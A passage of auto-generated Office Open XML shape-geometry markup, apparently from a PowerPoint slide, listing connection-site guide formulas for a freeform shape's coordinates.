              <a:gd name="connsiteY148" fmla="*/ 1189033 h 6858000"/>
              <a:gd name="connsiteX149" fmla="*/ 348665 w 1605470"/>
              <a:gd name="connsiteY149" fmla="*/ 1168288 h 6858000"/>
              <a:gd name="connsiteX150" fmla="*/ 340947 w 1605470"/>
              <a:gd name="connsiteY150" fmla="*/ 1142577 h 6858000"/>
              <a:gd name="connsiteX151" fmla="*/ 330253 w 1605470"/>
              <a:gd name="connsiteY151" fmla="*/ 1088484 h 6858000"/>
              <a:gd name="connsiteX152" fmla="*/ 318989 w 1605470"/>
              <a:gd name="connsiteY152" fmla="*/ 1016103 h 6858000"/>
              <a:gd name="connsiteX153" fmla="*/ 320445 w 1605470"/>
              <a:gd name="connsiteY153" fmla="*/ 932283 h 6858000"/>
              <a:gd name="connsiteX154" fmla="*/ 322681 w 1605470"/>
              <a:gd name="connsiteY154" fmla="*/ 915925 h 6858000"/>
              <a:gd name="connsiteX155" fmla="*/ 315310 w 1605470"/>
              <a:gd name="connsiteY155" fmla="*/ 896999 h 6858000"/>
              <a:gd name="connsiteX156" fmla="*/ 284718 w 1605470"/>
              <a:gd name="connsiteY156" fmla="*/ 821517 h 6858000"/>
              <a:gd name="connsiteX157" fmla="*/ 263668 w 1605470"/>
              <a:gd name="connsiteY157" fmla="*/ 751353 h 6858000"/>
              <a:gd name="connsiteX158" fmla="*/ 263226 w 1605470"/>
              <a:gd name="connsiteY158" fmla="*/ 721230 h 6858000"/>
              <a:gd name="connsiteX159" fmla="*/ 248897 w 1605470"/>
              <a:gd name="connsiteY159" fmla="*/ 681659 h 6858000"/>
              <a:gd name="connsiteX160" fmla="*/ 234316 w 1605470"/>
              <a:gd name="connsiteY160" fmla="*/ 635218 h 6858000"/>
              <a:gd name="connsiteX161" fmla="*/ 239327 w 1605470"/>
              <a:gd name="connsiteY161" fmla="*/ 613763 h 6858000"/>
              <a:gd name="connsiteX162" fmla="*/ 225269 w 1605470"/>
              <a:gd name="connsiteY162" fmla="*/ 598582 h 6858000"/>
              <a:gd name="connsiteX163" fmla="*/ 224950 w 1605470"/>
              <a:gd name="connsiteY163" fmla="*/ 576846 h 6858000"/>
              <a:gd name="connsiteX164" fmla="*/ 204576 w 1605470"/>
              <a:gd name="connsiteY164" fmla="*/ 530055 h 6858000"/>
              <a:gd name="connsiteX165" fmla="*/ 219064 w 1605470"/>
              <a:gd name="connsiteY165" fmla="*/ 469651 h 6858000"/>
              <a:gd name="connsiteX166" fmla="*/ 195012 w 1605470"/>
              <a:gd name="connsiteY166" fmla="*/ 448559 h 6858000"/>
              <a:gd name="connsiteX167" fmla="*/ 201434 w 1605470"/>
              <a:gd name="connsiteY167" fmla="*/ 441529 h 6858000"/>
              <a:gd name="connsiteX168" fmla="*/ 200655 w 1605470"/>
              <a:gd name="connsiteY168" fmla="*/ 428927 h 6858000"/>
              <a:gd name="connsiteX169" fmla="*/ 190059 w 1605470"/>
              <a:gd name="connsiteY169" fmla="*/ 430161 h 6858000"/>
              <a:gd name="connsiteX170" fmla="*/ 167079 w 1605470"/>
              <a:gd name="connsiteY170" fmla="*/ 367211 h 6858000"/>
              <a:gd name="connsiteX171" fmla="*/ 124571 w 1605470"/>
              <a:gd name="connsiteY171" fmla="*/ 302178 h 6858000"/>
              <a:gd name="connsiteX172" fmla="*/ 103243 w 1605470"/>
              <a:gd name="connsiteY172" fmla="*/ 211375 h 6858000"/>
              <a:gd name="connsiteX173" fmla="*/ 94571 w 1605470"/>
              <a:gd name="connsiteY173" fmla="*/ 184179 h 6858000"/>
              <a:gd name="connsiteX174" fmla="*/ 13437 w 1605470"/>
              <a:gd name="connsiteY174" fmla="*/ 19287 h 6858000"/>
              <a:gd name="connsiteX175" fmla="*/ 0 w 1605470"/>
              <a:gd name="connsiteY17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18807 w 1605470"/>
              <a:gd name="connsiteY57" fmla="*/ 5067850 h 6858000"/>
              <a:gd name="connsiteX58" fmla="*/ 721538 w 1605470"/>
              <a:gd name="connsiteY58" fmla="*/ 5060861 h 6858000"/>
              <a:gd name="connsiteX59" fmla="*/ 718242 w 1605470"/>
              <a:gd name="connsiteY59" fmla="*/ 5034192 h 6858000"/>
              <a:gd name="connsiteX60" fmla="*/ 719796 w 1605470"/>
              <a:gd name="connsiteY60" fmla="*/ 4993030 h 6858000"/>
              <a:gd name="connsiteX61" fmla="*/ 726705 w 1605470"/>
              <a:gd name="connsiteY61" fmla="*/ 4946844 h 6858000"/>
              <a:gd name="connsiteX62" fmla="*/ 722561 w 1605470"/>
              <a:gd name="connsiteY62" fmla="*/ 4932692 h 6858000"/>
              <a:gd name="connsiteX63" fmla="*/ 724935 w 1605470"/>
              <a:gd name="connsiteY63" fmla="*/ 4821504 h 6858000"/>
              <a:gd name="connsiteX64" fmla="*/ 732118 w 1605470"/>
              <a:gd name="connsiteY64" fmla="*/ 4801535 h 6858000"/>
              <a:gd name="connsiteX65" fmla="*/ 739787 w 1605470"/>
              <a:gd name="connsiteY65" fmla="*/ 4797794 h 6858000"/>
              <a:gd name="connsiteX66" fmla="*/ 741081 w 1605470"/>
              <a:gd name="connsiteY66" fmla="*/ 4784526 h 6858000"/>
              <a:gd name="connsiteX67" fmla="*/ 742865 w 1605470"/>
              <a:gd name="connsiteY67" fmla="*/ 4781211 h 6858000"/>
              <a:gd name="connsiteX68" fmla="*/ 751652 w 1605470"/>
              <a:gd name="connsiteY68" fmla="*/ 4761984 h 6858000"/>
              <a:gd name="connsiteX69" fmla="*/ 747700 w 1605470"/>
              <a:gd name="connsiteY69" fmla="*/ 4690749 h 6858000"/>
              <a:gd name="connsiteX70" fmla="*/ 743180 w 1605470"/>
              <a:gd name="connsiteY70" fmla="*/ 4584173 h 6858000"/>
              <a:gd name="connsiteX71" fmla="*/ 738263 w 1605470"/>
              <a:gd name="connsiteY71" fmla="*/ 4444346 h 6858000"/>
              <a:gd name="connsiteX72" fmla="*/ 756542 w 1605470"/>
              <a:gd name="connsiteY72" fmla="*/ 4350346 h 6858000"/>
              <a:gd name="connsiteX73" fmla="*/ 715481 w 1605470"/>
              <a:gd name="connsiteY73" fmla="*/ 4214165 h 6858000"/>
              <a:gd name="connsiteX74" fmla="*/ 719554 w 1605470"/>
              <a:gd name="connsiteY74" fmla="*/ 4090296 h 6858000"/>
              <a:gd name="connsiteX75" fmla="*/ 704810 w 1605470"/>
              <a:gd name="connsiteY75" fmla="*/ 4033999 h 6858000"/>
              <a:gd name="connsiteX76" fmla="*/ 705959 w 1605470"/>
              <a:gd name="connsiteY76" fmla="*/ 4031933 h 6858000"/>
              <a:gd name="connsiteX77" fmla="*/ 704535 w 1605470"/>
              <a:gd name="connsiteY77" fmla="*/ 4013953 h 6858000"/>
              <a:gd name="connsiteX78" fmla="*/ 700443 w 1605470"/>
              <a:gd name="connsiteY78" fmla="*/ 4010511 h 6858000"/>
              <a:gd name="connsiteX79" fmla="*/ 698282 w 1605470"/>
              <a:gd name="connsiteY79" fmla="*/ 3998331 h 6858000"/>
              <a:gd name="connsiteX80" fmla="*/ 690830 w 1605470"/>
              <a:gd name="connsiteY80" fmla="*/ 3974753 h 6858000"/>
              <a:gd name="connsiteX81" fmla="*/ 692428 w 1605470"/>
              <a:gd name="connsiteY81" fmla="*/ 3969950 h 6858000"/>
              <a:gd name="connsiteX82" fmla="*/ 685850 w 1605470"/>
              <a:gd name="connsiteY82" fmla="*/ 3933779 h 6858000"/>
              <a:gd name="connsiteX83" fmla="*/ 687181 w 1605470"/>
              <a:gd name="connsiteY83" fmla="*/ 3933093 h 6858000"/>
              <a:gd name="connsiteX84" fmla="*/ 691535 w 1605470"/>
              <a:gd name="connsiteY84" fmla="*/ 3922082 h 6858000"/>
              <a:gd name="connsiteX85" fmla="*/ 696613 w 1605470"/>
              <a:gd name="connsiteY85" fmla="*/ 3901461 h 6858000"/>
              <a:gd name="connsiteX86" fmla="*/ 719207 w 1605470"/>
              <a:gd name="connsiteY86" fmla="*/ 3813873 h 6858000"/>
              <a:gd name="connsiteX87" fmla="*/ 718632 w 1605470"/>
              <a:gd name="connsiteY87" fmla="*/ 3806161 h 6858000"/>
              <a:gd name="connsiteX88" fmla="*/ 718939 w 1605470"/>
              <a:gd name="connsiteY88" fmla="*/ 3805957 h 6858000"/>
              <a:gd name="connsiteX89" fmla="*/ 718966 w 1605470"/>
              <a:gd name="connsiteY89" fmla="*/ 3797724 h 6858000"/>
              <a:gd name="connsiteX90" fmla="*/ 717581 w 1605470"/>
              <a:gd name="connsiteY90" fmla="*/ 3792098 h 6858000"/>
              <a:gd name="connsiteX91" fmla="*/ 716465 w 1605470"/>
              <a:gd name="connsiteY91" fmla="*/ 3777135 h 6858000"/>
              <a:gd name="connsiteX92" fmla="*/ 718198 w 1605470"/>
              <a:gd name="connsiteY92" fmla="*/ 3771656 h 6858000"/>
              <a:gd name="connsiteX93" fmla="*/ 721941 w 1605470"/>
              <a:gd name="connsiteY93" fmla="*/ 3769007 h 6858000"/>
              <a:gd name="connsiteX94" fmla="*/ 721407 w 1605470"/>
              <a:gd name="connsiteY94" fmla="*/ 3767709 h 6858000"/>
              <a:gd name="connsiteX95" fmla="*/ 730103 w 1605470"/>
              <a:gd name="connsiteY95" fmla="*/ 3738082 h 6858000"/>
              <a:gd name="connsiteX96" fmla="*/ 737449 w 1605470"/>
              <a:gd name="connsiteY96" fmla="*/ 3673397 h 6858000"/>
              <a:gd name="connsiteX97" fmla="*/ 736745 w 1605470"/>
              <a:gd name="connsiteY97" fmla="*/ 3637109 h 6858000"/>
              <a:gd name="connsiteX98" fmla="*/ 740188 w 1605470"/>
              <a:gd name="connsiteY98" fmla="*/ 3536883 h 6858000"/>
              <a:gd name="connsiteX99" fmla="*/ 747726 w 1605470"/>
              <a:gd name="connsiteY99" fmla="*/ 3435652 h 6858000"/>
              <a:gd name="connsiteX100" fmla="*/ 774383 w 1605470"/>
              <a:gd name="connsiteY100" fmla="*/ 3381564 h 6858000"/>
              <a:gd name="connsiteX101" fmla="*/ 774870 w 1605470"/>
              <a:gd name="connsiteY101" fmla="*/ 3375761 h 6858000"/>
              <a:gd name="connsiteX102" fmla="*/ 770510 w 1605470"/>
              <a:gd name="connsiteY102" fmla="*/ 3361844 h 6858000"/>
              <a:gd name="connsiteX103" fmla="*/ 767933 w 1605470"/>
              <a:gd name="connsiteY103" fmla="*/ 3356929 h 6858000"/>
              <a:gd name="connsiteX104" fmla="*/ 766158 w 1605470"/>
              <a:gd name="connsiteY104" fmla="*/ 3349058 h 6858000"/>
              <a:gd name="connsiteX105" fmla="*/ 766414 w 1605470"/>
              <a:gd name="connsiteY105" fmla="*/ 3348763 h 6858000"/>
              <a:gd name="connsiteX106" fmla="*/ 764166 w 1605470"/>
              <a:gd name="connsiteY106" fmla="*/ 3341588 h 6858000"/>
              <a:gd name="connsiteX107" fmla="*/ 749397 w 1605470"/>
              <a:gd name="connsiteY107" fmla="*/ 3307769 h 6858000"/>
              <a:gd name="connsiteX108" fmla="*/ 766960 w 1605470"/>
              <a:gd name="connsiteY108" fmla="*/ 3250522 h 6858000"/>
              <a:gd name="connsiteX109" fmla="*/ 767385 w 1605470"/>
              <a:gd name="connsiteY109" fmla="*/ 3229163 h 6858000"/>
              <a:gd name="connsiteX110" fmla="*/ 769208 w 1605470"/>
              <a:gd name="connsiteY110" fmla="*/ 3217217 h 6858000"/>
              <a:gd name="connsiteX111" fmla="*/ 770350 w 1605470"/>
              <a:gd name="connsiteY111" fmla="*/ 3216125 h 6858000"/>
              <a:gd name="connsiteX112" fmla="*/ 756043 w 1605470"/>
              <a:gd name="connsiteY112" fmla="*/ 3183755 h 6858000"/>
              <a:gd name="connsiteX113" fmla="*/ 756544 w 1605470"/>
              <a:gd name="connsiteY113" fmla="*/ 3178642 h 6858000"/>
              <a:gd name="connsiteX114" fmla="*/ 744144 w 1605470"/>
              <a:gd name="connsiteY114" fmla="*/ 3158586 h 6858000"/>
              <a:gd name="connsiteX115" fmla="*/ 739378 w 1605470"/>
              <a:gd name="connsiteY115" fmla="*/ 3147669 h 6858000"/>
              <a:gd name="connsiteX116" fmla="*/ 734648 w 1605470"/>
              <a:gd name="connsiteY116" fmla="*/ 3145733 h 6858000"/>
              <a:gd name="connsiteX117" fmla="*/ 729329 w 1605470"/>
              <a:gd name="connsiteY117" fmla="*/ 3129034 h 6858000"/>
              <a:gd name="connsiteX118" fmla="*/ 729994 w 1605470"/>
              <a:gd name="connsiteY118" fmla="*/ 3126682 h 6858000"/>
              <a:gd name="connsiteX119" fmla="*/ 720862 w 1605470"/>
              <a:gd name="connsiteY119" fmla="*/ 3114519 h 6858000"/>
              <a:gd name="connsiteX120" fmla="*/ 707471 w 1605470"/>
              <a:gd name="connsiteY120" fmla="*/ 3106272 h 6858000"/>
              <a:gd name="connsiteX121" fmla="*/ 680201 w 1605470"/>
              <a:gd name="connsiteY121" fmla="*/ 2958185 h 6858000"/>
              <a:gd name="connsiteX122" fmla="*/ 622815 w 1605470"/>
              <a:gd name="connsiteY122" fmla="*/ 2762989 h 6858000"/>
              <a:gd name="connsiteX123" fmla="*/ 571733 w 1605470"/>
              <a:gd name="connsiteY123" fmla="*/ 2554718 h 6858000"/>
              <a:gd name="connsiteX124" fmla="*/ 551827 w 1605470"/>
              <a:gd name="connsiteY124" fmla="*/ 2485734 h 6858000"/>
              <a:gd name="connsiteX125" fmla="*/ 542550 w 1605470"/>
              <a:gd name="connsiteY125" fmla="*/ 2447068 h 6858000"/>
              <a:gd name="connsiteX126" fmla="*/ 529511 w 1605470"/>
              <a:gd name="connsiteY126" fmla="*/ 2425819 h 6858000"/>
              <a:gd name="connsiteX127" fmla="*/ 528878 w 1605470"/>
              <a:gd name="connsiteY127" fmla="*/ 2408971 h 6858000"/>
              <a:gd name="connsiteX128" fmla="*/ 535510 w 1605470"/>
              <a:gd name="connsiteY128" fmla="*/ 2402874 h 6858000"/>
              <a:gd name="connsiteX129" fmla="*/ 538122 w 1605470"/>
              <a:gd name="connsiteY129" fmla="*/ 2381443 h 6858000"/>
              <a:gd name="connsiteX130" fmla="*/ 514451 w 1605470"/>
              <a:gd name="connsiteY130" fmla="*/ 2261920 h 6858000"/>
              <a:gd name="connsiteX131" fmla="*/ 486968 w 1605470"/>
              <a:gd name="connsiteY131" fmla="*/ 2182937 h 6858000"/>
              <a:gd name="connsiteX132" fmla="*/ 488555 w 1605470"/>
              <a:gd name="connsiteY132" fmla="*/ 2155135 h 6858000"/>
              <a:gd name="connsiteX133" fmla="*/ 486013 w 1605470"/>
              <a:gd name="connsiteY133" fmla="*/ 2118008 h 6858000"/>
              <a:gd name="connsiteX134" fmla="*/ 487006 w 1605470"/>
              <a:gd name="connsiteY134" fmla="*/ 2050531 h 6858000"/>
              <a:gd name="connsiteX135" fmla="*/ 478812 w 1605470"/>
              <a:gd name="connsiteY135" fmla="*/ 1963269 h 6858000"/>
              <a:gd name="connsiteX136" fmla="*/ 442619 w 1605470"/>
              <a:gd name="connsiteY136" fmla="*/ 1910499 h 6858000"/>
              <a:gd name="connsiteX137" fmla="*/ 446785 w 1605470"/>
              <a:gd name="connsiteY137" fmla="*/ 1903212 h 6858000"/>
              <a:gd name="connsiteX138" fmla="*/ 436547 w 1605470"/>
              <a:gd name="connsiteY138" fmla="*/ 1861531 h 6858000"/>
              <a:gd name="connsiteX139" fmla="*/ 390346 w 1605470"/>
              <a:gd name="connsiteY139" fmla="*/ 1732919 h 6858000"/>
              <a:gd name="connsiteX140" fmla="*/ 362657 w 1605470"/>
              <a:gd name="connsiteY140" fmla="*/ 1663540 h 6858000"/>
              <a:gd name="connsiteX141" fmla="*/ 361783 w 1605470"/>
              <a:gd name="connsiteY141" fmla="*/ 1615777 h 6858000"/>
              <a:gd name="connsiteX142" fmla="*/ 342578 w 1605470"/>
              <a:gd name="connsiteY142" fmla="*/ 1563678 h 6858000"/>
              <a:gd name="connsiteX143" fmla="*/ 355658 w 1605470"/>
              <a:gd name="connsiteY143" fmla="*/ 1519474 h 6858000"/>
              <a:gd name="connsiteX144" fmla="*/ 348400 w 1605470"/>
              <a:gd name="connsiteY144" fmla="*/ 1477995 h 6858000"/>
              <a:gd name="connsiteX145" fmla="*/ 334485 w 1605470"/>
              <a:gd name="connsiteY145" fmla="*/ 1373769 h 6858000"/>
              <a:gd name="connsiteX146" fmla="*/ 342792 w 1605470"/>
              <a:gd name="connsiteY146" fmla="*/ 1307086 h 6858000"/>
              <a:gd name="connsiteX147" fmla="*/ 343980 w 1605470"/>
              <a:gd name="connsiteY147" fmla="*/ 1189033 h 6858000"/>
              <a:gd name="connsiteX148" fmla="*/ 348665 w 1605470"/>
              <a:gd name="connsiteY148" fmla="*/ 1168288 h 6858000"/>
              <a:gd name="connsiteX149" fmla="*/ 340947 w 1605470"/>
              <a:gd name="connsiteY149" fmla="*/ 1142577 h 6858000"/>
              <a:gd name="connsiteX150" fmla="*/ 330253 w 1605470"/>
              <a:gd name="connsiteY150" fmla="*/ 1088484 h 6858000"/>
              <a:gd name="connsiteX151" fmla="*/ 318989 w 1605470"/>
              <a:gd name="connsiteY151" fmla="*/ 1016103 h 6858000"/>
              <a:gd name="connsiteX152" fmla="*/ 320445 w 1605470"/>
              <a:gd name="connsiteY152" fmla="*/ 932283 h 6858000"/>
              <a:gd name="connsiteX153" fmla="*/ 322681 w 1605470"/>
              <a:gd name="connsiteY153" fmla="*/ 915925 h 6858000"/>
              <a:gd name="connsiteX154" fmla="*/ 315310 w 1605470"/>
              <a:gd name="connsiteY154" fmla="*/ 896999 h 6858000"/>
              <a:gd name="connsiteX155" fmla="*/ 284718 w 1605470"/>
              <a:gd name="connsiteY155" fmla="*/ 821517 h 6858000"/>
              <a:gd name="connsiteX156" fmla="*/ 263668 w 1605470"/>
              <a:gd name="connsiteY156" fmla="*/ 751353 h 6858000"/>
              <a:gd name="connsiteX157" fmla="*/ 263226 w 1605470"/>
              <a:gd name="connsiteY157" fmla="*/ 721230 h 6858000"/>
              <a:gd name="connsiteX158" fmla="*/ 248897 w 1605470"/>
              <a:gd name="connsiteY158" fmla="*/ 681659 h 6858000"/>
              <a:gd name="connsiteX159" fmla="*/ 234316 w 1605470"/>
              <a:gd name="connsiteY159" fmla="*/ 635218 h 6858000"/>
              <a:gd name="connsiteX160" fmla="*/ 239327 w 1605470"/>
              <a:gd name="connsiteY160" fmla="*/ 613763 h 6858000"/>
              <a:gd name="connsiteX161" fmla="*/ 225269 w 1605470"/>
              <a:gd name="connsiteY161" fmla="*/ 598582 h 6858000"/>
              <a:gd name="connsiteX162" fmla="*/ 224950 w 1605470"/>
              <a:gd name="connsiteY162" fmla="*/ 576846 h 6858000"/>
              <a:gd name="connsiteX163" fmla="*/ 204576 w 1605470"/>
              <a:gd name="connsiteY163" fmla="*/ 530055 h 6858000"/>
              <a:gd name="connsiteX164" fmla="*/ 219064 w 1605470"/>
              <a:gd name="connsiteY164" fmla="*/ 469651 h 6858000"/>
              <a:gd name="connsiteX165" fmla="*/ 195012 w 1605470"/>
              <a:gd name="connsiteY165" fmla="*/ 448559 h 6858000"/>
              <a:gd name="connsiteX166" fmla="*/ 201434 w 1605470"/>
              <a:gd name="connsiteY166" fmla="*/ 441529 h 6858000"/>
              <a:gd name="connsiteX167" fmla="*/ 200655 w 1605470"/>
              <a:gd name="connsiteY167" fmla="*/ 428927 h 6858000"/>
              <a:gd name="connsiteX168" fmla="*/ 190059 w 1605470"/>
              <a:gd name="connsiteY168" fmla="*/ 430161 h 6858000"/>
              <a:gd name="connsiteX169" fmla="*/ 167079 w 1605470"/>
              <a:gd name="connsiteY169" fmla="*/ 367211 h 6858000"/>
              <a:gd name="connsiteX170" fmla="*/ 124571 w 1605470"/>
              <a:gd name="connsiteY170" fmla="*/ 302178 h 6858000"/>
              <a:gd name="connsiteX171" fmla="*/ 103243 w 1605470"/>
              <a:gd name="connsiteY171" fmla="*/ 211375 h 6858000"/>
              <a:gd name="connsiteX172" fmla="*/ 94571 w 1605470"/>
              <a:gd name="connsiteY172" fmla="*/ 184179 h 6858000"/>
              <a:gd name="connsiteX173" fmla="*/ 13437 w 1605470"/>
              <a:gd name="connsiteY173" fmla="*/ 19287 h 6858000"/>
              <a:gd name="connsiteX174" fmla="*/ 0 w 1605470"/>
              <a:gd name="connsiteY17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87214 w 1605470"/>
              <a:gd name="connsiteY41" fmla="*/ 5451511 h 6858000"/>
              <a:gd name="connsiteX42" fmla="*/ 608019 w 1605470"/>
              <a:gd name="connsiteY42" fmla="*/ 5385461 h 6858000"/>
              <a:gd name="connsiteX43" fmla="*/ 622750 w 1605470"/>
              <a:gd name="connsiteY43" fmla="*/ 5363084 h 6858000"/>
              <a:gd name="connsiteX44" fmla="*/ 638731 w 1605470"/>
              <a:gd name="connsiteY44" fmla="*/ 5330009 h 6858000"/>
              <a:gd name="connsiteX45" fmla="*/ 672224 w 1605470"/>
              <a:gd name="connsiteY45" fmla="*/ 5273739 h 6858000"/>
              <a:gd name="connsiteX46" fmla="*/ 681823 w 1605470"/>
              <a:gd name="connsiteY46" fmla="*/ 5241779 h 6858000"/>
              <a:gd name="connsiteX47" fmla="*/ 693049 w 1605470"/>
              <a:gd name="connsiteY47" fmla="*/ 5225268 h 6858000"/>
              <a:gd name="connsiteX48" fmla="*/ 694069 w 1605470"/>
              <a:gd name="connsiteY48" fmla="*/ 5217684 h 6858000"/>
              <a:gd name="connsiteX49" fmla="*/ 701410 w 1605470"/>
              <a:gd name="connsiteY49" fmla="*/ 5193377 h 6858000"/>
              <a:gd name="connsiteX50" fmla="*/ 704713 w 1605470"/>
              <a:gd name="connsiteY50" fmla="*/ 5179288 h 6858000"/>
              <a:gd name="connsiteX51" fmla="*/ 705697 w 1605470"/>
              <a:gd name="connsiteY51" fmla="*/ 5173621 h 6858000"/>
              <a:gd name="connsiteX52" fmla="*/ 701331 w 1605470"/>
              <a:gd name="connsiteY52" fmla="*/ 5159961 h 6858000"/>
              <a:gd name="connsiteX53" fmla="*/ 708008 w 1605470"/>
              <a:gd name="connsiteY53" fmla="*/ 5144295 h 6858000"/>
              <a:gd name="connsiteX54" fmla="*/ 704941 w 1605470"/>
              <a:gd name="connsiteY54" fmla="*/ 5125185 h 6858000"/>
              <a:gd name="connsiteX55" fmla="*/ 711771 w 1605470"/>
              <a:gd name="connsiteY55" fmla="*/ 5121884 h 6858000"/>
              <a:gd name="connsiteX56" fmla="*/ 718807 w 1605470"/>
              <a:gd name="connsiteY56" fmla="*/ 5067850 h 6858000"/>
              <a:gd name="connsiteX57" fmla="*/ 721538 w 1605470"/>
              <a:gd name="connsiteY57" fmla="*/ 5060861 h 6858000"/>
              <a:gd name="connsiteX58" fmla="*/ 718242 w 1605470"/>
              <a:gd name="connsiteY58" fmla="*/ 5034192 h 6858000"/>
              <a:gd name="connsiteX59" fmla="*/ 719796 w 1605470"/>
              <a:gd name="connsiteY59" fmla="*/ 4993030 h 6858000"/>
              <a:gd name="connsiteX60" fmla="*/ 726705 w 1605470"/>
              <a:gd name="connsiteY60" fmla="*/ 4946844 h 6858000"/>
              <a:gd name="connsiteX61" fmla="*/ 722561 w 1605470"/>
              <a:gd name="connsiteY61" fmla="*/ 4932692 h 6858000"/>
              <a:gd name="connsiteX62" fmla="*/ 724935 w 1605470"/>
              <a:gd name="connsiteY62" fmla="*/ 4821504 h 6858000"/>
              <a:gd name="connsiteX63" fmla="*/ 732118 w 1605470"/>
              <a:gd name="connsiteY63" fmla="*/ 4801535 h 6858000"/>
              <a:gd name="connsiteX64" fmla="*/ 739787 w 1605470"/>
              <a:gd name="connsiteY64" fmla="*/ 4797794 h 6858000"/>
              <a:gd name="connsiteX65" fmla="*/ 741081 w 1605470"/>
              <a:gd name="connsiteY65" fmla="*/ 4784526 h 6858000"/>
              <a:gd name="connsiteX66" fmla="*/ 742865 w 1605470"/>
              <a:gd name="connsiteY66" fmla="*/ 4781211 h 6858000"/>
              <a:gd name="connsiteX67" fmla="*/ 751652 w 1605470"/>
              <a:gd name="connsiteY67" fmla="*/ 4761984 h 6858000"/>
              <a:gd name="connsiteX68" fmla="*/ 747700 w 1605470"/>
              <a:gd name="connsiteY68" fmla="*/ 4690749 h 6858000"/>
              <a:gd name="connsiteX69" fmla="*/ 743180 w 1605470"/>
              <a:gd name="connsiteY69" fmla="*/ 4584173 h 6858000"/>
              <a:gd name="connsiteX70" fmla="*/ 738263 w 1605470"/>
              <a:gd name="connsiteY70" fmla="*/ 4444346 h 6858000"/>
              <a:gd name="connsiteX71" fmla="*/ 756542 w 1605470"/>
              <a:gd name="connsiteY71" fmla="*/ 4350346 h 6858000"/>
              <a:gd name="connsiteX72" fmla="*/ 715481 w 1605470"/>
              <a:gd name="connsiteY72" fmla="*/ 4214165 h 6858000"/>
              <a:gd name="connsiteX73" fmla="*/ 719554 w 1605470"/>
              <a:gd name="connsiteY73" fmla="*/ 4090296 h 6858000"/>
              <a:gd name="connsiteX74" fmla="*/ 704810 w 1605470"/>
              <a:gd name="connsiteY74" fmla="*/ 4033999 h 6858000"/>
              <a:gd name="connsiteX75" fmla="*/ 705959 w 1605470"/>
              <a:gd name="connsiteY75" fmla="*/ 4031933 h 6858000"/>
              <a:gd name="connsiteX76" fmla="*/ 704535 w 1605470"/>
              <a:gd name="connsiteY76" fmla="*/ 4013953 h 6858000"/>
              <a:gd name="connsiteX77" fmla="*/ 700443 w 1605470"/>
              <a:gd name="connsiteY77" fmla="*/ 4010511 h 6858000"/>
              <a:gd name="connsiteX78" fmla="*/ 698282 w 1605470"/>
              <a:gd name="connsiteY78" fmla="*/ 3998331 h 6858000"/>
              <a:gd name="connsiteX79" fmla="*/ 690830 w 1605470"/>
              <a:gd name="connsiteY79" fmla="*/ 3974753 h 6858000"/>
              <a:gd name="connsiteX80" fmla="*/ 692428 w 1605470"/>
              <a:gd name="connsiteY80" fmla="*/ 3969950 h 6858000"/>
              <a:gd name="connsiteX81" fmla="*/ 685850 w 1605470"/>
              <a:gd name="connsiteY81" fmla="*/ 3933779 h 6858000"/>
              <a:gd name="connsiteX82" fmla="*/ 687181 w 1605470"/>
              <a:gd name="connsiteY82" fmla="*/ 3933093 h 6858000"/>
              <a:gd name="connsiteX83" fmla="*/ 691535 w 1605470"/>
              <a:gd name="connsiteY83" fmla="*/ 3922082 h 6858000"/>
              <a:gd name="connsiteX84" fmla="*/ 696613 w 1605470"/>
              <a:gd name="connsiteY84" fmla="*/ 3901461 h 6858000"/>
              <a:gd name="connsiteX85" fmla="*/ 719207 w 1605470"/>
              <a:gd name="connsiteY85" fmla="*/ 3813873 h 6858000"/>
              <a:gd name="connsiteX86" fmla="*/ 718632 w 1605470"/>
              <a:gd name="connsiteY86" fmla="*/ 3806161 h 6858000"/>
              <a:gd name="connsiteX87" fmla="*/ 718939 w 1605470"/>
              <a:gd name="connsiteY87" fmla="*/ 3805957 h 6858000"/>
              <a:gd name="connsiteX88" fmla="*/ 718966 w 1605470"/>
              <a:gd name="connsiteY88" fmla="*/ 3797724 h 6858000"/>
              <a:gd name="connsiteX89" fmla="*/ 717581 w 1605470"/>
              <a:gd name="connsiteY89" fmla="*/ 3792098 h 6858000"/>
              <a:gd name="connsiteX90" fmla="*/ 716465 w 1605470"/>
              <a:gd name="connsiteY90" fmla="*/ 3777135 h 6858000"/>
              <a:gd name="connsiteX91" fmla="*/ 718198 w 1605470"/>
              <a:gd name="connsiteY91" fmla="*/ 3771656 h 6858000"/>
              <a:gd name="connsiteX92" fmla="*/ 721941 w 1605470"/>
              <a:gd name="connsiteY92" fmla="*/ 3769007 h 6858000"/>
              <a:gd name="connsiteX93" fmla="*/ 721407 w 1605470"/>
              <a:gd name="connsiteY93" fmla="*/ 3767709 h 6858000"/>
              <a:gd name="connsiteX94" fmla="*/ 730103 w 1605470"/>
              <a:gd name="connsiteY94" fmla="*/ 3738082 h 6858000"/>
              <a:gd name="connsiteX95" fmla="*/ 737449 w 1605470"/>
              <a:gd name="connsiteY95" fmla="*/ 3673397 h 6858000"/>
              <a:gd name="connsiteX96" fmla="*/ 736745 w 1605470"/>
              <a:gd name="connsiteY96" fmla="*/ 3637109 h 6858000"/>
              <a:gd name="connsiteX97" fmla="*/ 740188 w 1605470"/>
              <a:gd name="connsiteY97" fmla="*/ 3536883 h 6858000"/>
              <a:gd name="connsiteX98" fmla="*/ 747726 w 1605470"/>
              <a:gd name="connsiteY98" fmla="*/ 3435652 h 6858000"/>
              <a:gd name="connsiteX99" fmla="*/ 774383 w 1605470"/>
              <a:gd name="connsiteY99" fmla="*/ 3381564 h 6858000"/>
              <a:gd name="connsiteX100" fmla="*/ 774870 w 1605470"/>
              <a:gd name="connsiteY100" fmla="*/ 3375761 h 6858000"/>
              <a:gd name="connsiteX101" fmla="*/ 770510 w 1605470"/>
              <a:gd name="connsiteY101" fmla="*/ 3361844 h 6858000"/>
              <a:gd name="connsiteX102" fmla="*/ 767933 w 1605470"/>
              <a:gd name="connsiteY102" fmla="*/ 3356929 h 6858000"/>
              <a:gd name="connsiteX103" fmla="*/ 766158 w 1605470"/>
              <a:gd name="connsiteY103" fmla="*/ 3349058 h 6858000"/>
              <a:gd name="connsiteX104" fmla="*/ 766414 w 1605470"/>
              <a:gd name="connsiteY104" fmla="*/ 3348763 h 6858000"/>
              <a:gd name="connsiteX105" fmla="*/ 764166 w 1605470"/>
              <a:gd name="connsiteY105" fmla="*/ 3341588 h 6858000"/>
              <a:gd name="connsiteX106" fmla="*/ 749397 w 1605470"/>
              <a:gd name="connsiteY106" fmla="*/ 3307769 h 6858000"/>
              <a:gd name="connsiteX107" fmla="*/ 766960 w 1605470"/>
              <a:gd name="connsiteY107" fmla="*/ 3250522 h 6858000"/>
              <a:gd name="connsiteX108" fmla="*/ 767385 w 1605470"/>
